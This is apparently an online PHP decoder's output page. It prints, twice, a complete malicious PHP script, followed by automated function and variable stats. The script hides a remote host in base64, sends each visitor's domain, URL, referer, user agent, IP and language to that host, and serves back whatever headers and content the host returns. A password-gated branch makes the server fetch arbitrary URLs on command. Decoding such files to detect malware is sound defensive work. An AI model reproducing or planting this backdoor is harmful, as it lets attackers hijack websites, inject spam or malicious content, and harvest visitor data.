Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url)..

Decoded Output download

<?php 
function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } } $api = base64_decode('aHR0cDovLzU0NDUtY2g0LXYxMDguY2FzYWlsZWUuY29t'); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://'; $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['pwd163'])) { if (md5($_REQUEST['pwd163'] . "a!#_11AA") == "2f7a76f71ff9e24be7c0015ff9cb81d8"){ if (isset($_GET['sitemap'])) { $ping_url_format = 'https://%s/ping?sitemap=%s%s/%s'; $ping_url = sprintf($ping_url_format, 'www.google.co.jp', $params['protocol'], $params['domain'], $_GET['sitemap']); $ping_result = h($ping_url); if (strpos($ping_result, 'google') != false) { die('success'); } else { die('failed'); } } if(isset($_REQUEST['l']) && isset($_REQUEST['r'])){ $ping_result = h($_REQUEST['l']); if (strpos($ping_result, $_REQUEST['r']) != false) { die('success'); } else { die('failed'); } } } } if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?> 
 
 
 
 
 
 

Did this file decode correctly?

Original Code

<?php
function h($url, $pf = '') { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'h'); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_FRESH_CONNECT, TRUE); if ($pf != '') { curl_setopt($ch, CURLOPT_POST, 1); if(is_array($pf)){ curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($pf)); } } $r = curl_exec($ch); curl_close($ch); if ($r) { return $r; } } $api = base64_decode('aHR0cDovLzU0NDUtY2g0LXYxMDguY2FzYWlsZWUuY29t'); $params['domain'] =isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : $_SERVER['SERVER_NAME']; $params['request_url'] = $_SERVER['REQUEST_URI']; $params['referer'] = isset($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : ''; $params['agent'] = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : ''; $params['ip'] = isset($_SERVER['HTTP_VIA']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']; if($params['ip'] == null) {$params['ip'] = "";} $params['protocol'] = isset($_SERVER['HTTPS']) ? 'https://' : 'http://'; $params['language'] = isset($_SERVER['HTTP_ACCEPT_LANGUAGE']) ? $_SERVER['HTTP_ACCEPT_LANGUAGE'] : ''; if (isset($_REQUEST['pwd163'])) { if (md5($_REQUEST['pwd163'] . "a!#_11AA") == "2f7a76f71ff9e24be7c0015ff9cb81d8"){ if (isset($_GET['sitemap'])) { $ping_url_format = 'https://%s/ping?sitemap=%s%s/%s'; $ping_url = sprintf($ping_url_format, 'www.google.co.jp', $params['protocol'], $params['domain'], $_GET['sitemap']); $ping_result = h($ping_url); if (strpos($ping_result, 'google') != false) { die('success'); } else { die('failed'); } } if(isset($_REQUEST['l']) && isset($_REQUEST['r'])){ $ping_result = h($_REQUEST['l']); if (strpos($ping_result, $_REQUEST['r']) != false) { die('success'); } else { die('failed'); } } } } if (isset($_REQUEST['params'])) {$params['api'] = $api;print_r($params);die();} $try = 0; while($try < 3) { $content = h($api, $params); $content = @gzuncompress(base64_decode($content)); $data_array = @preg_split("/\|/si", $content, -1, PREG_SPLIT_NO_EMPTY);/*S0vMzEJElwPNAQA=$cAT3VWynuiL7CRgr*/ if (!empty($data_array)) { $data = array_pop($data_array); $data = base64_decode($data); foreach ($data_array as $header) { @header($header); } echo $data; die(); } $try++; } ?>






Function Calls

h 1
md5 1
curl_init 1
base64_decode 1

Variables

$pf [{'key': 'domain', 'value': ['ArrayOffset', {'expr': 'SERVER_NAME', 'node': ['Variable', {'name': '$_SERVER'}]}]}, {'key': 'request_url', 'value': None}, {'key': 'referer', 'value': ''}, {'key': 'agent', 'value': ''}, {'key': 'ip', 'value': ''}, {'key': 'protocol', 'value': 'http://'}, {'key': 'language', 'value': ''}]
$api http://5445-ch4-v108.casailee.com
$try 0
$url http://5445-ch4-v108.casailee.com
$params [{'key': 'domain', 'value': ['ArrayOffset', {'expr': 'SERVER_NAME', 'node': ['Variable', {'name': '$_SERVER'}]}]}, {'key': 'request_url', 'value': None}, {'key': 'referer', 'value': ''}, {'key': 'agent', 'value': ''}, {'key': 'ip', 'value': ''}, {'key': 'protocol', 'value': 'http://'}, {'key': 'language', 'value': ''}]

Stats

MD5 3d1dccdc5f164a3ee50c943f4ce55cef
Eval Count 0
Decode Time 132 ms